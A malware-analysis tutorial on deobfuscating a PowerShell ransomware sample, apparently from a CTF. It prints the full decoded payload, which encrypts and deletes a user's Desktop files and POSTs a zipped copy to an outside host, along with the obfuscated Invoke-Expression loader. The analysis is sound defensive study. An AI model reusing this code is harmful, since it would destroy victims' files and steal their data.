How to analyze PowerShell obfuscated code, Part-3
In this part we will analyze the same obfuscated PowerShell code in another way. Here are the 1st and 2nd parts:
Open PowerShell ISE in admin mode. Navigate to File > Open, then select the encoded_ps.ps1 script.
If we execute the script at this point, it will run to completion and the ransomware will encrypt all the files. To prevent that, we need to remove this piece of code: |${;}”|&${;}; but we keep the ” quote that comes before the pipe sign. The screenshot below makes this clearer. We remove it because of the & sign: & is PowerShell's call operator, which tells PowerShell to execute what follows it (here it is effectively invoking the expression).
After removing that code, the end of our script will look like this. Now click the green play button. You will then get the following, another layer of obfuscated code.
iex means Invoke-Expression, which is used to execute a PowerShell command or script.
If we do not remove that code, the script will look like this. See below:
Notice the iex at the end. This iex would then execute the 2nd-layer obfuscated code in memory.
PS C:\Windows\system32> Get-Variable
Name Value
---- -----
" [CHar]
$ ${;}
& 8
( 6
) 7
. 3
; iex
? True
@ 2
[ 4
] 5
^ ${;}
| 9
+ 1
= 0
args {}
ConfirmPreference High
ConsoleFileName
DebugPreference SilentlyContinue
Error {}
ErrorActionPreference Continue
ErrorView NormalView
ExecutionContext System.Management.Automation.EngineIntrinsics
false False
FormatEnumerationLimit 4
HOME C:\Users\Avi_Mahim
Host System.Management.Automation.Internal.Host.InternalHost
input System.Collections.ArrayList+ArrayListEnumeratorSimple
MaximumAliasCount 4096
MaximumDriveCount 4096
MaximumErrorCount 256
MaximumFunctionCount 4096
MaximumHistoryCount 4096
MaximumVariableCount 4096
MyInvocation System.Management.Automation.InvocationInfo
NestedPromptLevel 0
null
OutputEncoding System.Text.SBCSCodePageEncoding
PID 3280
profile C:\Users\Avi_Mahim\Documents\WindowsPowerShell\Microsoft.PowerShellISE_profile.ps1
ProgressPreference Continue
PSBoundParameters {}
PSCommandPath
PSCulture en-US
PSDefaultParameterValues {}
PSEmailServer
PSHOME C:\Windows\System32\WindowsPowerShell\v1.0
psISE Microsoft.PowerShell.Host.ISE.ObjectModelRoot
PSScriptRoot
PSSessionApplicationName wsman
PSSessionConfigurationName http://schemas.microsoft.com/powershell/Microsoft.PowerShell
PSSessionOption System.Management.Automation.Remoting.PSSessionOption
PSUICulture en-US
psUnsupportedConsoleApplica... {wmic, wmic.exe, cmd, cmd.exe...}
PSVersionTable {PSVersion, WSManStackVersion, SerializationVersion, CLRVersion...}
PWD C:\Windows\system32
ShellId Microsoft.PowerShell
StackTrace
true True
VerbosePreference SilentlyContinue
WarningPreference Continue
WhatIfPreference False
PS C:\Windows\system32>
We can see some variables.
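The listing shows that the variable named ; holds iex, so the &${;} at the end of the layer is what executes it. As an added example (not part of the original write-up), this Python sketch lists such execution sinks statically before a layer is run; it also covers the alias-to-Invoke-Expression pattern that appears in the second layer. The function names, the regexes and the sample strings are assumptions made for this illustration.

```python
import re

SINKS = {"iex", "invoke-expression"}  # names that run a string as code
CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
VAR = r'\$(?:\{([^}]+)\}|(\w+))'       # ${name} or $name

def fold_concat(src):
    """Collapse "iN"+"vo"+"Ke" style literal concatenation into one literal."""
    count = 1
    while count:
        src, count = CONCAT.subn(lambda m: f'"{m.group(1)}{m.group(2)}"', src)
    return src

def find_sinks(layer, known_vars=None):
    """List (kind, detail) execution sinks in a layer without running it.
    known_vars: optional {name: value} pairs read from Get-Variable output."""
    src = fold_concat(layer)
    values = {k.lower(): v.lower() for k, v in (known_vars or {}).items()}
    for m in re.finditer(VAR + r'\s*=\s*"([^"]*)"', src):
        values[(m.group(1) or m.group(2)).lower()] = m.group(3).lower()
    found = set()
    # Invoke-Expression or its alias written out as a command
    for m in re.finditer(r'(?<![\w$"-])(iex|invoke-expression)(?![\w"-])', src, re.I):
        found.add(("direct", m.group(1).lower()))
    # Call operator applied to a variable, e.g. |&${;}
    for m in re.finditer(r'&\s*' + VAR, src):
        name = (m.group(1) or m.group(2)).lower()
        found.add(("call", f"{name} -> {values.get(name, 'unresolved')}"))
    # Alias whose value resolves to a sink, e.g. New-Alias -Name X -Value $v
    alias_re = r'(?:new|set)-alias\s+-name\s+(\S+)\s+-value\s+' + VAR
    for m in re.finditer(alias_re, src, re.I):
        target = values.get((m.group(2) or m.group(3)).lower(), "unresolved")
        if target in SINKS:
            found.add(("alias", f"{m.group(1).lower()} -> {target}"))
    return sorted(found)

# Constructed samples (harmless payloads) with the same shape as the layers here.
SAMPLE_TAIL = '"Write-Output 1" |&${;}'
SAMPLE_ALIAS = ('$k = "iN"+"vo"+"Ke"+"-e"+"xP"+"RE"+"ss"+"Io"+"n" ; '
                'neW-aLIAs -NAme PwN -VAlUE $k -forCE ; pWN $payload ;')

if __name__ == "__main__":
    print(find_sinks(SAMPLE_TAIL, {";": "iex"}))
    print(find_sinks(SAMPLE_ALIAS))
```

Any finding of kind "call" or "alias" marks a spot to neutralize, as done above with the trailing |&${;}, before pressing play.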
Now we save the new layer of obfuscated code to a char.txt file on the desktop. Then we save char.txt again as char.ps1.
Then we open the char.ps1 file in the same way in PowerShell ISE and assign a variable $x.
Once it is executed in memory, we redirect the output into a charoutput.txt file on the desktop.
$9HvtMFbC2RGJX6YOASjNeBx = "=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" ; $OaET = $9HvtMFbC2RGJX6YOASjNeBx.ToCharArray() ; [array]::Reverse($OaET) ; -join $OaET 2>&1> $null ; $biPIv9ahScgYwGXl0FyV = [SySteM.tExt.EnCOding]::uTf8.GetStRIng([SySTEm.COnVerT]::FrombASe64StRINg("$OaET")) ; $ehyGknDcqxFwCYJz5vfot4T8 = "iN"+"vo"+"Ke"+"-e"+"xP"+"RE"+"ss"+"Io"+"n" ; neW-aLIAs -NAme PwN -VAlUE $ehyGknDcqxFwCYJz5vfot4T8 -forCE ; pWN $biPIv9ahScgYwGXl0FyV ;
Then we get this reversed base64 code (the = sign at the start tells us the code is in reverse order) along with some other, slightly more readable code. Using CyberChef, we first reverse the base64 code with the Reverse recipe and then decode it with the base64 recipe. Then we get the following.
It is the same encryption function that we saw in part 1.
function encryptFiles{
Param(
[Parameter(Mandatory=${true}, position=0)]
[string] $baseDirectory
)
foreach($File in (Get-ChildItem $baseDirectory -Recurse -File)){
if ($File.extension -ne ".enc"){
$DestinationFile = $File.FullName + ".enc"
$FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open)
$FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create)
$cipher = [System.Security.Cryptography.SymmetricAlgorithm]::Create("AES")
$cipher.key = [System.Text.Encoding]::UTF8.GetBytes("7h3_k3y_70_unl0ck_4ll_7h3_f1l35!")
$cipher.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$cipher.GenerateIV()
$FileStreamWriter.Write([System.BitConverter]::GetBytes($cipher.IV.Length), 0, 4)
$FileStreamWriter.Write($cipher.IV, 0, $cipher.IV.Length)
$Transform = $cipher.CreateEncryptor()
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
$FileStreamReader.CopyTo($CryptoStream)
$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
Remove-Item -LiteralPath $File.FullName
}
}
}
$flag = "flag{892a8921517dcecf90685d478aedf5e2}"
$ErrorActionPreference= 'silentlycontinue'
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split("\")[-1]
encryptFiles("C:\Users\"+$user+"\Desktop")
Add-Type -assembly "system.io.compression.filesystem"
[io.compression.zipfile]::CreateFromDirectory("C:\Users\"+$user+"\Desktop", "C:\Users\"+$user+"\Downloads\Desktop.zip")
$zipFileBytes = Get-Content -Path ("C:\Users\"+$user+"\Downloads\Desktop.zip") -Raw -Encoding Byte
$zipFileData = [Convert]::ToBase64String($zipFileBytes)
$body = ConvertTo-Json -InputObject @{file=$zipFileData}
Invoke-Webrequest -Method Post -Uri "https://www.thepowershellhacker.com/exfiltration" -Body $body
Remove-Item -LiteralPath ("C:\Users\"+$user+"\Downloads\Desktop.zip")
That is one way to find the encryption function. There is another way: we can use the PowerDecode PowerShell tool to uncover the obfuscation layers.
From the above link you can download the tool.
Now open PowerShell in admin mode and run the command Set-ExecutionPolicy Bypass
Now execute the script with the .\GUI.ps1 command.
Now you need to provide the script that you want to decode or deobfuscate. It will then ask for the destination folder where the tool will save the decoded script; provide that folder. Then it will start removing the obfuscation layers.
From the 1st layer of obfuscation we get another layer of obfuscated code. But I saw that the tool failed to decode the 2nd layer, which I did manually using CyberChef. Please check the part-1 writeup.
But thankfully this code successfully decoded this part.
The main thing is that you need to know how to do it manually; the tool will then do the rest.
For your practice I am giving you another piece of code. This tool will help you decode it as well.
Process:
1. Decode the code using CyberChef. (Use the From Base64 and Remove null bytes recipes.)
2. Take the output and save it in a text file.
3. Then follow the PowerDecode decoding process.
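The reverse-then-Base64 step used on the second layer and the From Base64 plus Remove null bytes step in the process above can both be done statically, without executing anything. The following Python is an added example, not code from the original post or from PowerDecode; the function names and the sample strings (constructed, with harmless payloads) are assumptions. It goes slightly beyond the text by trying each literal both as written and reversed and keeping the readable result.

```python
import base64
import binascii
import re
import string

QUOTED_B64 = re.compile(r'"([A-Za-z0-9+/=]{16,})"')  # long Base64-looking literals

def decode_blob(blob):
    """Try a literal as Base64 both as written and reversed; return
    (text, steps) for the more readable result, or None if neither is text."""
    best = None
    for steps, cand in (("from-base64", blob), ("reverse, from-base64", blob[::-1])):
        try:
            raw = base64.b64decode(cand, validate=True)
        except (binascii.Error, ValueError):
            continue  # e.g. '=' padding at the front of a reversed string
        if not raw:
            continue
        odd = raw[1::2]
        if odd and odd.count(0) >= 0.9 * len(odd):
            # UTF-16LE text: every second byte is NUL ("remove null bytes")
            text = raw.decode("utf-16-le", errors="replace")
            steps += ", remove null bytes"
        else:
            text = raw.decode("utf-8", errors="replace")
        score = sum(c in string.printable for c in text) / len(text)
        if score >= 0.9 and (best is None or score > best[0]):
            best = (score, text, steps)
    return (best[1], best[2]) if best else None

def decode_layer(script):
    """Decode every Base64 literal in a script layer without executing it."""
    results = []
    for blob in QUOTED_B64.findall(script):
        decoded = decode_blob(blob)
        if decoded:
            results.append(decoded)
    return results

def _enc(data):
    return base64.b64encode(data).decode()

# Constructed samples with harmless payloads, shaped like the layers above.
SAMPLE_REVERSED = '$s = "%s" ; $c = $s.ToCharArray() ; [array]::Reverse($c)' % (
    _enc(b"Write-Output 'layer 2'")[::-1])
SAMPLE_UTF16 = '$p = "%s"' % _enc("Get-Date".encode("utf-16-le"))

if __name__ == "__main__":
    for sample in (SAMPLE_REVERSED, SAMPLE_UTF16):
        for text, steps in decode_layer(sample):
            print(f"[{steps}] {text}")
```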
Thanks. I hope you learned something new from here.
LinkedIn:
https://www.linkedin.com/in/md-mahimbin-firoj-7b8a5a113/